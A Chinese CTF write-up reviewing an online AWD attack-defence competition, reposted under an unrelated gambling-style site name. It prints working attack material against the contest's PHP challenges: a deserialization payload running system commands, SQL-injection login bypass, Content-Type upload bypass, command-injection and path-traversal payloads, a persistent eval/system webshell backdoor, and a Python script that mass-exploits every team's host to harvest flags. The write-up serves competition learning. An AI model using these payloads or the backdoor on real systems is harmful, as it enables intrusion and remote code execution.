亿宝娱乐“北极星杯”AWD线上赛复盘_HUC惠仲娱乐

亿宝娱乐

前言

10.3 星盟安全周年庆举办了一场线上AWD比赛

参赛队伍总计31支,见到了不少熟悉的ID

神仙大战果然被暴打hhhhhh,运气好还水了一个小奖品。

学到了不少东西,今天来写一下复盘总结。

比赛规则

  • 每个队伍分配到一个docker主机,给定web(web)/pwn(pwn)用户权限,通过特定的端口和密码进行连接;

  • 每台docker主机上运行一个web服务或者其他的服务,需要选手保证其可用性,并尝试审计代码,攻击其他队伍。

  • 选手需自行登录平台熟悉自助式初始化、api提交flag等功能。初始密码为队长所设密码,队长需在比赛开始前10分钟向主办方提交密码,过期未提交视为弃权。

  • 选手可以通过使用漏洞获取其他队伍的服务器的权限,读取他人服务器上的flag并提交到平台上。每次成功攻击可获得5分,被攻击者扣除5分;有效攻击五分钟一轮。选手需要保证己方服务的可用性,每次服务不可用,扣除10分;服务检测五分钟一轮;

  • 不允许使用任何形式的DOS攻击,第一次发现扣1000分,第二次发现取消比赛资格。

比赛最终结果将在10月3日晚19:00-19:30于北极星杯网络安全交流群直播公布,同时会有技术分享及抽奖活动,敬请关注。

比赛开始

这次比赛3个web 2个pwn

首先就是老套路,打包源码跟数据库,然后D盾扫一扫。

因为队友的分工是权限维持,自己的分工主要是get flag,就直接看漏洞吧。

WEB1

预留后门

三个冰蝎一个普通一句话

难受的就是自己主要是撸批量getflag脚本的,但是冰蝎的shell怎么tm写脚本啊喵喵喵???

第一时间写好了普通一句话的批量脚本

改了改让他自动提交

当时大家可能都还没修,手速快就自动交了两轮

但是可以看到10队已经上了通防脚本,返回了一个假的flag

反序列化

sqlhelper.php最下面有这样一句

if (isset($_POST['un']) && isset($_GET['x'])){ class A{     public $name;     public $male;      function __destruct(){         $a = $this->name;         $a($this->male);     } }  unserialize($_POST['un']); }

$name 传个system $male传个cat /flag 就可以拿到flag了

payload:

GET: ?x=yzddmr6

POST: un=O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};

注入上传

login.php

<?php if (isset($_POST['username'])){     include_once "../sqlhelper.php";     $username=$_POST['username'];     $password = md5($_POST['password']);     $sql = "SELECT * FROM admin where name='$username' and password='$password';";     $help = new sqlhelper();     $res  = $help->execute_dql($sql);     echo $sql;     if ($res->num_rows){         session_start();         $row = $res->fetch_assoc();         $_SESSION['username'] = $username;         $_SESSION['id'] = $row['id'];         $_SESSION['icon'] = $row['icon'];         echo "<script>alert('登录成功');window.location.href='/'</script>";     }else{         echo "<script>alert('用户名密码错误')</script>";     } } ?>

可以看到直接把接收到了$username给带入到了sql语句中,产生注入

直接用万能密码就可以绕过

接着往下看登录之后可以做什么

info.php

if (isset($_FILES)) {         if ($_FILES["file"]["error"] > 0) {             echo "错误:" . $_FILES["file"]["error"] . "<br>";         } else {             $type = $_FILES["file"]["type"];             if($type=="image/jpeg"){                 $name =$_FILES["file"]["name"] ;                 if (file_exists("upload/" . $_FILES["file"]["name"]))                 {                     echo "<script>alert('文件已经存在');</script>";                 }                 else                 {                     move_uploaded_file($_FILES["file"]["tmp_name"], "assets/images/avatars/" . $_FILES["file"]["name"]);                     $helper = new sqlhelper();                     $sql = "UPDATE  admin SET icon='$name' WHERE id=$_SESSION[id]";                     $helper->execute_dml($sql);                 }             }else{                 echo "<script>alert('不允许上传的类型');</script>";             }         } }

可以看到他对文件类型的判断仅仅是if($type=="image/jpeg") 这里在数据包里修改content-type即可绕过,所上传的文件将会保存在assets/images/avatars/目录下。

但是由于平台数据库有点问题,无法进行注入,所以这个洞当时也没利用起来。

WEB2

web2是web1的升级版,当时少看见一个文件读取的洞,亏死啦!

预留后门

pww.php跟pass.php都是冰蝎。。。

不会写冰蝎的批量脚本,队伍又31个队,就基本没管这个后门

index.php里面就是一个普通的一句话

命令注入

我们可以看到D盾还报了一个exec后门

直接把$host双引号里带入

然后看一下$host是怎么来的

然后看数据是如何放入数据库的

在收到$_POST['host']后程序还经过了一层addslashes操作,过滤其中的单双引号还有斜杠

但是实际上在执行的$r = exec("ping -c 1 $host");这一句中并不需要引号逃逸,所以他的过滤操作并没有什么卵用。

因为exec是没有回显的,所以构造以下payload
||cat /flag > /ver/www/html/1.txt

把flag输出到网站根目录下

好像是需要登录,具体我也忘了

任意文件读取

img.php

<?php $file = $_GET['img']; $img = file_get_contents('images/icon/'.$file); //使用图片头输出浏览器 header("Content-Type: image/jpeg;text/html; charset=utf-8"); echo $img; exit;

payload:/img.php?img=../../../../../../../flag

反序列化

同web1,只不过不需要x参数了

WEB3

能利用起来的好像就这一个洞,当时也没来得及看

命令执行

export.php

<?php     if (isset($_POST['name'])){     $name = $_POST['name'];     exec("tar -cf backup/$name images/*.jpg");     echo "<div class=\"alert alert-success\" role=\"alert\">     导出成功,<a href='backup/$name'>点击下载</a></div>"} ?>

老套路,同web2

payload: || cat /flag > /var/www/html/1.txt ||

艰难的权限维持

其实AWD比赛刚开始的时候,最重要的是维持权限而不是急着交flag。

当我还在审第一个web的时候,看到预留后门就问队友要不要给他框架弹个shell

结果他告诉我框架爆炸了。。。弹shell一直500。。。

缓缓打出三个问号???喵喵喵???

以前都是用团队的这个框架没问题,结果今天死活连不上。。。。

GG,这咋整啊,31个队手工维权吗。。。

所以就只能搞一些骚操作

循环批量GET FLAG

撸了一串脚本,来回跑,然后加上接口自动提交,没有框架只能这样了

乌鸦坐飞机

对,没错,我们就是乌鸦,坐了别的队的飞机。

自己靶机的流量日志上发现了别的队伍的payload

写了个脚本看了下,几乎所有的队伍都被种上了这个师傅的马

不死马循环写入,被删后马上复活

你的马看起来不错,下一秒就是我的了。

白嫖了好几轮的flag

然后闲的没事想着不如连上蚁剑看看吧,找找其他师傅的马

批量导入一下

看见其他队伍被种了马,满怀热泪的帮他们删了站。

有一个队伍被命令注入打惨了,也帮他们删个站吧。

当然还看到不少其他队伍的马

甚至还有批量上waf的py脚本

毕竟是其他队伍的内部脚本,象征性打个码

流量日志里还发现一个狼人队伍的循环感染不死马

会遍历目录把所有的php文件头部加上后门

<?php if (md5($_REQUEST['pass'])==="8e68ca4946b8e146a408f727eaf9da7c"){@eval($_REQUEST['code']);@system($_REQUEST['sys']);} ?>

不过惊讶的是他的md5居然可以解开

somd5牛逼!

好马,下一秒就是我的了

批量脚本走起

import requests import json url="http://39.100.119.37:{0}{1}80/login/index.php?pass=Happy.Every.Day&code=system('cat /flag');"  def submit(flag):     hosturl="http://39.100.119.37:10000/commit/flag"     data={'flag':flag,"token":"xxxxx"}     data=json.dumps(data)     r=requests.post(hosturl,data=data,headers={"Cookie":"PHPSESSID=xxxxx","Content-Type":"application/json; charset=UTF-8"})     print(r.text)  for j in range(1,4):     for i in range(1,32):         i=str(i).zfill(2)         url1=url.format(j,i)         print(url1)         try:             res=requests.get(url=url1)             if 'flag' in res.text:                 submit(res.text[0:38])                 print(res.text[0:38])         except:             pass

尾声

最后web基本上都修了,payload已经打不动了

只能靠不死马来get flag

因为开始手快,得分比较多,还有负责修的队友比较给力,掉分不是很多。

然而毕竟是白嫖别人的马,所以增长分数的速度越来越慢

最后还往后掉了一名,不过还拿个小奖hhhhh

总结

师傅们一个个都心狠手辣,但是说到最后还是自己有很多没有考虑到的地方

因为框架主要是需要先弹个shell到自己的服务器,然后才能自动维权,get flag等一系列操作

但是开始框架崩了后直接懵了,不知道怎么办

其实现在想自己完全可以当时重写一个批量种不死马的脚本来维权

但是当时31个队伍,三个一堆洞的web,难免有些手忙脚乱。

有些队伍的通防很厉害,匹配到关键字直接返回一个假的flag,自己准备也写一个。

怀疑他们用的都是一家的脚本。。。。返回的flag都一样

最后

AWD一般都是线下赛,线上AWD见得还不多。

星盟的这个线上赛体验还是很不错的,能够撑住31个队伍,每个队伍5个题也是挺厉害的

中途虽然平台有宕机但是很快就恢复了。

给星盟点个赞,希望今后能够越办越好~

本人水平有限,文笔较差,如果有什么写的不对的地方还希望大家能够不吝赐教